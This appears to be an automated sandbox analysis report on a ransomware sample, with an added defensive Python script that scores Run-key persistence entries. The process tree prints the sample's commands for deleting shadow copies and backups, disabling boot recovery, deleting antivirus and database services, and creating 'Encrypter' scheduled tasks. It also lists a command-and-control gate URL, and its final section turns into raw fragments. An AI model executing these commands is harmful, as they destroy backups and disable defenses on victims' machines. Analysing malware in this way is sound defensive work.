Analysis
- max time kernel: 150s
- max time network: 81s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 16-04-2021 07:53

Static task: static1
Behavioral task: behavioral1
- Sample: 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
- Resource: win7v20210410
Behavioral task: behavioral2
- Sample: 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
- Resource: win10v20210408
General
- Target: 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
- Size: 242KB
- MD5: c5d02a59e543e126359998b982e87d45
- SHA1: e6960b254e0215493a29471949b1ff84b6da1b59
- SHA256: 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51
- SHA512: 6fc4f510ab3f13e0ab49d0b46b4b7a440de33b693ba6d20c6459dd59721363fbbda59975a51f78fa85d2f452fcc519595b83d80ae580c00ab75d80adbc214721
Malware Config
- Extracted
  Path: C:\Users\Admin\AppData\Roaming\!files-recovery.txt
  URL: http://silveoa6gm.temp.swtest.ru/gate.php?advertid=7&name=BAT847R6DTUBSX
- Extracted
  Path: C:\Users\Public\Videos\Sample Videos\!files-recovery.txt
  URL: http://silveoa6gm.temp.swtest.ru/gate.php?advertid=7&name=RORLGF2TRYJKRN
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Executes dropped EXE (2 IoCs)
  Processes:
    pid 3588  norapid.exe
    pid 3120  norapid.exe
- Adds Run key to start application (2 TTPs, 4 IoCs)
  Processes (description: Set value (str); ioc; process):
    \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\HelloAV = "C:\\Users\\Admin\\AppData\\Roaming\\norapid.exe"  (074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe)
    \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\WelcomeBack = "C:\\Users\\Admin\\AppData\\Roaming\\rapidrecovery.txt.txt"  (074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe)
    \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\WelcomeBack = "C:\\Users\\Admin\\AppData\\Roaming\\rapidrecovery.txt.txt"  (norapid.exe)
    \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\WelcomeBack = "C:\\Users\\Admin\\AppData\\Roaming\\rapidrecovery.txt.txt"  (norapid.exe)
- Drops desktop.ini file(s) (18 IoCs)
  Processes (all entries: File opened for modification, by norapid.exe):
    C:\Users\Public\Videos\Sample Videos\desktop.ini
    C:\Users\Public\desktop.ini
    C:\Users\Admin\Searches\desktop.ini
    C:\Users\Admin\Pictures\desktop.ini
    C:\Users\Admin\Favorites\Links\desktop.ini
    C:\Users\Admin\Contacts\desktop.ini
    C:\Users\Public\Downloads\desktop.ini
    C:\Users\Admin\Videos\desktop.ini
    C:\Users\Admin\Favorites\desktop.ini
    C:\Users\Public\Videos\desktop.ini
    C:\Users\Public\Pictures\desktop.ini
    C:\Users\Public\Desktop\desktop.ini
    C:\Users\Admin\Saved Games\desktop.ini
    C:\Users\Admin\Links\desktop.ini
    C:\Users\Admin\Documents\desktop.ini
    C:\Users\Public\Pictures\Sample Pictures\desktop.ini
    C:\Users\Public\Libraries\desktop.ini
    C:\Users\Admin\Favorites\Links for United States\desktop.ini
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTP, 6 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes:
    pid 3648  schtasks.exe
    pid 3684  schtasks.exe
    pid 2376  schtasks.exe
    pid 3840  schtasks.exe
    pid 3860  schtasks.exe
    pid 3368  schtasks.exe
- Interacts with shadow copies (2 TTPs, 3 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
    pid 3712  vssadmin.exe
    pid 4004  vssadmin.exe
    pid 2980  vssadmin.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
    pid 788  074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe  (all 64 entries are this one process)
- Suspicious behavior: GetForegroundWindowSpam (3 IoCs)
  Processes:
    pid 788   074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
    pid 3588  norapid.exe
    pid 3120  norapid.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (privilege enabled on the process token; the report lists the first 64 entries):
    pid 3832  vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
    pid 3816  WMIC.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
    pid 3792  WMIC.exe: the same 20 privileges as pid 3816
    pid 3816  WMIC.exe: the same 20 privileges again (second round)
    pid 2632  WMIC.exe: SeIncreaseQuotaPrivilege (list cut off at 64 entries)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: PID 788 (074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe) wrote to the memory of its child cmd.exe processes; each target appears four times in the report (16 targets, 64 entries).
    Target PIDs: 1704, 1384, 1328, 1520, 1440, 316, 1720, 556, 1056, 732, 912, 1468, 1180, 1920, 1644, 1604 (all cmd.exe)
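The two Run values above are worth a second look: HelloAV points at the dropped norapid.exe under AppData\Roaming (a value name unrelated to the file it launches), and WelcomeBack points at rapidrecovery.txt.txt, a text file rather than a program, which the shell hands to its file association at every logon so the ransom note reopens. The following script is an added example, not part of the sandbox report or of the sample: it scores HKCU Run values with those heuristics. The HelloAV and WelcomeBack entries are taken from the report; the OneDrive entry is a constructed benign control; the weights, the drop-directory list and the threshold are assumptions for illustration, not a standard.

```python
"""Heuristic triage of HKCU\\...\\CurrentVersion\\Run values.

Added example; the HelloAV and WelcomeBack entries come from the report,
the OneDrive entry is a constructed benign control, and the scoring
weights and threshold are assumptions."""
import ntpath
import re

PE_EXT = {".exe", ".com", ".scr", ".dll"}
SCRIPT_EXT = {".bat", ".cmd", ".vbs", ".js", ".wsf", ".ps1", ".hta"}
# Locations a user-level dropper can write without elevation (assumed list).
DROP_DIRS = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")
SUSPICIOUS_AT = 3  # assumed threshold

# (value name, value data) as stored under the Run key.
RUN_VALUES = [
    ("HelloAV", r"C:\Users\Admin\AppData\Roaming\norapid.exe"),            # from the report
    ("WelcomeBack", r"C:\Users\Admin\AppData\Roaming\rapidrecovery.txt.txt"),  # from the report
    ("OneDrive", r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),  # constructed
]


def target_path(data):
    """Path the shell will launch: the quoted first token, else up to the first space."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', data)
    return (m.group(1) or m.group(2)) if m else data


def score_run_value(name, data):
    """Return the launch target, a score and the reasons that produced it."""
    path = target_path(data)
    low = path.lower()
    ext = ntpath.splitext(low)[1]
    stem = ntpath.splitext(ntpath.basename(low))[0]
    reasons = []
    if ext not in PE_EXT and ext not in SCRIPT_EXT:
        # A document target is opened through its file association at logon;
        # in this report that is the ransom note.
        reasons.append(("non_executable_target", 3))
    elif ext in SCRIPT_EXT:
        reasons.append(("script_target", 1))
    if any(d in low for d in DROP_DIRS):
        reasons.append(("user_writable_drop_location", 2))
    elif "\\users\\" in low:
        reasons.append(("user_profile_path", 1))
    if name.lower() not in stem:
        reasons.append(("value_name_unrelated_to_file", 1))
    score = sum(w for _, w in reasons)
    return {"name": name, "target": path, "score": score,
            "reasons": [r for r, _ in reasons], "suspicious": score >= SUSPICIOUS_AT}


def triage_run_key(values):
    """Score every value and return them highest score first."""
    return sorted((score_run_value(n, d) for n, d in values),
                  key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in triage_run_key(RUN_VALUES):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f'{flag:10} score={r["score"]}  {r["name"]} -> {r["target"]}  {r["reasons"]}')
```

On the report's two entries this yields WelcomeBack (non-executable target, Roaming path, unrelated name) well above the threshold and HelloAV (Roaming path, unrelated name) at it, while the constructed OneDrive control stays below because it launches a binary whose name matches the value. Scoring with reasons rather than a yes/no rule keeps the analyst's decision visible, and the same function can be fed the output of a registry export or a live `reg query` with no change.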
Processes
Each line gives the depth in the process tree in brackets, the image path, then the command line as recorded; signature hits are listed beneath the process.

[1] C:\Users\Admin\AppData\Local\Temp\074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe    "C:\Users\Admin\AppData\Local\Temp\074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe"
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" rem Delite Service "Hyper-V"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmickvpexchange"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmicguestinterface"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmicshutdown"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmicheartbeat"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmicrdv"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "storflt"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmictimesync"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmicvss"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" rem Delite Service "SQL"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQLSERVER"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLSERVERAGENT"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLBrowser"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MsDtsServer130"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SSISTELEMETRY130"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLWriter"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQL$VEEAMSQL2012"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLAgent$VEEAMSQL2012"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQL"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLAgent"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQLServerADHelper100"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQLServerOLAPService"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MsDtsServer100"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "ReportServer"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY$HL"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "TMBMServer"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQL$PROGID"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQL$WOLTERSKLUWER"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLAgent$PROGID"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLAgent$WOLTERSKLUWER"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher$OPTIMA"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQL$OPTIMA"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLAgent$OPTIMA"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "ReportServer$OPTIMA"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "msftesql$SQLEXPRESS"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "postgresql-x64-9.4"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" rem Delite Service "AV: Webroot"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "WRSVC"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" rem Delite Service "AV: ESET"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "ekrn"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" rem Delite Service "AV: Kaspersky"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "klim6"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "AVP18.0.0"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "KLIF"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "klpd"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "klflt"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "klbackupdisk"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "klbackupflt"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "klkbdflt"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "klmouflt"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "klhk"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "KSDE1.0.0"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "kltap"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" rem Delite Service "AV: Trend Micro"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "TmFilter"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "TMLWCSService"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "tmusa"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "TmPreFilter"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "TMSmartRelayService"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "TMiCRCScanService"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "VSApiNt"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "TmCCSF"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "tmlisten"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "TmProxy"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "ntrtscan"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "UniFi"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "ofcservice"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" rem Kill "SQL"
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im sqlbrowser.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im sqlwriter.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im msmdsrv.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im MsDtsSrvr.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im sqlceip.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im Ssms.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im SQLAGENT.EXE
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im fdhost.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im ReportingServicesService.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im msftesql.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im pg_ctl.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im postgres.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" rem Kill
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" taskkill -f -im UniFi.exe
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet
    [3] C:\Windows\SysWOW64\vssadmin.exe    vssadmin.exe Delete Shadows /All /Quiet
        - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP
  [2] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe    wmic SHADOWCOPY DELETE
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\wbem\WMIC.exe    "C:\Windows\System32\wbem\WMIC.exe" wmic SHADOWCOPY DELETE
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\schtasks.exe    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Encrypter /TR C:\Users\Admin\AppData\Roaming\norapid.exe
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\schtasks.exe    "C:\Windows\System32\schtasks.exe" /Create /SC ONLOGON /TN EncrypterSt /TR C:\Users\Admin\AppData\Roaming\norapid.exe
      - Creates scheduled task(s)
  [2] C:\Windows\SysWOW64\cmd.exe    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\rapidrecovery.txt.txt

[1] C:\Windows\system32\vssvc.exe    C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\taskeng.exe    taskeng.exe {BD538C07-1139-4ACA-8814-435B2182BF93} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
  [2] C:\Users\Admin\AppData\Roaming\norapid.exe    C:\Users\Admin\AppData\Roaming\norapid.exe
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: GetForegroundWindowSpam
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" rem Delite Service "Hyper-V"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmickvpexchange"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmicguestinterface"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmicshutdown"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmicheartbeat"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmicrdv"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "storflt"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmictimesync"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "vmicvss"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" rem Delite Service "SQL"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQLSERVER"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLSERVERAGENT"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLBrowser"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MsDtsServer130"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SSISTELEMETRY130"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLWriter"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQL$VEEAMSQL2012"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLAgent$VEEAMSQL2012"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQL"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLAgent"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQLServerADHelper100"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQLServerOLAPService"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MsDtsServer100"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "ReportServer"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY$HL"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "TMBMServer"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQL$PROGID"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQL$WOLTERSKLUWER"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLAgent$PROGID"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLAgent$WOLTERSKLUWER"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher$OPTIMA"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "MSSQL$OPTIMA"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "SQLAgent$OPTIMA"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "ReportServer$OPTIMA"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "msftesql$SQLEXPRESS"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" sc delete "postgresql-x64-9.4"
    [3] C:\Windows\SysWOW64\cmd.exe    "C:\Windows\System32\cmd.exe" rem Delite Service "AV: Webroot"
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "WRSVC"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: ESET"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "ekrn"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Kaspersky"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klim6"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "AVP18.0.0"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "KLIF"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klpd"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klbackupdisk"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klbackupflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klkbdflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klmouflt"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "klhk"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "KSDE1.0.0"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" sc delete "kltap"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Trend Micro"3⤵
-
